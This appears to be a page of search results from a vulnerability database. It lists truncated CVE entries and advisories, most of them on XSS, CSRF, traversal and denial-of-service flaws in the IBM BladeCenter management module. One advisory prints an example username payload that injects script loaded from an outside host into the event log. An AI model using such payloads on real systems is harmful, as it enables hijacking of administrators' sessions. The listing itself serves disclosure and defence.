829 matches found
Java Runtime CMM readMabCurveData Buffer Overflow
Added: 10/04/2010; CVE: CVE-2010-0838; BID: 39069; OSVDB: 63500. Background: Oracle Java SE and Java for Business are development platforms for developing and deploying Java applications. They include the Java SE Development Kit (JDK) and the Java Runtime Environment (JRE). The JRE provides the minimum...
Cross site scripting
Multiple cross-site scripting (XSS) vulnerabilities on the IBM BladeCenter with Advanced Management Module (AMM) firmware build ID BPET48L, and possibly other versions before 4.7 and 5.0, allow remote attackers to inject arbitrary web script or HTML via the (1) INDEX or (2) IPADDR parameter to...
IBM BladeCenter Management Module Cross Site Scripting / Directory Traversal
Digital Security Research Group DSecRG Advisory DSECRG-09-054 Application: IBM BladeCenter Management Module Versions Affected: BPET48L and may be other versions Vendor URL: http://www-03.ibm.com/systems/bladecenter/ Bug: XSS, Directory traversal, Information disclosure Exploits: YES Reported:...
Code injection
The IBM BladeCenter with Advanced Management Module (AMM) firmware before bpet50g does not properly perform interrupt sharing for USB and iSCSI, which allows remote attackers to cause a denial of service (management module reboot) via TCP packets with malformed application data...
CVE-2010-1460
The IBM BladeCenter with Advanced Management Module (AMM) firmware before bpet50g does not properly perform interrupt sharing for USB and iSCSI, which allows remote attackers to cause a denial of service (management module reboot) via TCP packets with malformed application data...
BladeCenter AMM Denial Of Service
Digital Security Research Group DSecRG Advisory DSECRG-09-049 Application: IBM BladeCenter Management Module Versions Affected: before BPET50G Vendor URL: http://www-03.ibm.com/systems/bladecenter/ Bug: DoS Exploits: YES Reported: 24.07.2009 Vendor response: 26.07.2009 Date of Public Advisory:...
IBM BladeCenter Management Module - DoS vulnerability
Exploit for hardware platform in category dos / poc. IBM BladeCenter Management Module - DoS vulnerability. DSECRG-09-049 IBM BladeCenter Management Module - DoS vulnerability Source:...
IBM Bladecenter Management Module - Denial of Service
DSECRG-09-049 IBM BladeCenter Management Module - DoS vulnerability Source: http://www.dsecrg.com/pages/vul/show.php?id=149 This device can be remotely rebooted by sending malformed TCP packets Digital Security Research Group DSecRG Advisory DSECRG-09-049 Application: IBM BladeCenter Management...
IBM Bladecenter Management Module - Denial of Service
IBM Bladecenter Management Module - Denial of Service DSECRG-09-049 IBM BladeCenter Management Module - DoS vulnerability Source: http://www.dsecrg.com/pages/vul/show.php?id=149 This device can be remotely rebooted by sending malformed TCP packets Digital Security Research Group DSecRG Advisory...
Using Flash upload loopholes to penetrate a server-vulnerability warning-the black bar safety net
Many sites now, for the sake of their image, use a rotating Flash display on the home page, and some use a picture show; content is the core of a site, and to keep up the site's appearance they frequently update the picture or Flash files in website background design...
Code injection
Multiple unspecified vulnerabilities in the Advanced Management Module firmware before 2.50G for the IBM BladeCenter T 8720-2xx and 8730-2xx have unknown impact and attack vectors...
CVE-2009-3935
CVE-2009-3935 affects the IBM BladeCenter T Advanced Management Module (AMM) firmware prior to version 2.50G (8720-2xx and 8730-2xx). The connected sources confirm multiple unspecified vulnerabilities with unknown impact and attack vectors; no concrete root cause, affected subcomponents, exploit ...
CVE-2009-1288
Multiple cross-site scripting (XSS) vulnerabilities in the Advanced Management Module (AMM) on the IBM BladeCenter, including the BladeCenter H with BPET36H 54, allow remote attackers to inject arbitrary web script or HTML via (1) the username in a login action or (2) the PATH parameter to...
Code injection
private/login.ssi in the Advanced Management Module (AMM) on the IBM BladeCenter, including the BladeCenter H with BPET36H 54, allows remote attackers to discover the access roles and scopes of arbitrary user accounts via a modified WEBINDEX parameter...
Cross site request forgery (CSRF)
Multiple cross-site request forgery (CSRF) vulnerabilities in the web administration interface in the Advanced Management Module (AMM) on the IBM BladeCenter, including the BladeCenter H with BPET36H 54, allow remote attackers to hijack the authentication of administrators, as demonstrated by a...
CVE-2009-1288
Multiple cross-site scripting (XSS) vulnerabilities in the Advanced Management Module (AMM) on the IBM BladeCenter, including the BladeCenter H with BPET36H 54, allow remote attackers to inject arbitrary web script or HTML via (1) the username in a login action or (2) the PATH parameter to...
CVE-2009-1288
The CVE-2009-1288 entry describes multiple cross-site scripting (XSS) vulnerabilities in IBM BladeCenter’s Advanced Management Module (AMM), including the BladeCenter H with BPET36H 54. The issues allow remote attackers to inject arbitrary web script or HTML via the username field during login or...
CVE-2009-1290
Multiple cross-site request forgery (CSRF) vulnerabilities in the web administration interface in the Advanced Management Module (AMM) on the IBM BladeCenter, including the BladeCenter H with BPET36H 54, allow remote attackers to hijack the authentication of administrators, as demonstrated by a...
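IBM BladeCenter Advanced Management Module Cross-Site Scripting and Cross-Site Request Forgery Vulnerabilities
BUGTRAQ ID: 34447 IBM BladeCenter is IBM's series of high-performance blade servers. The web management interface of the Advanced Management Module (AMM) used by IBM BladeCenter does not properly filter user-submitted input and requests. If a user attempts to log in with malicious credentials, the AMM records the submitted credentials on the event log page, and the injected content is executed later when an administrator views the event log. For example, an attacker can log in with the following username to inject JavaScript: /scriptscript src="//l7.fi"/scriptscript...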
IBM BladeCenter Advanced Management Module multiple security vulnerabilities
Cross-site scripting, information leak...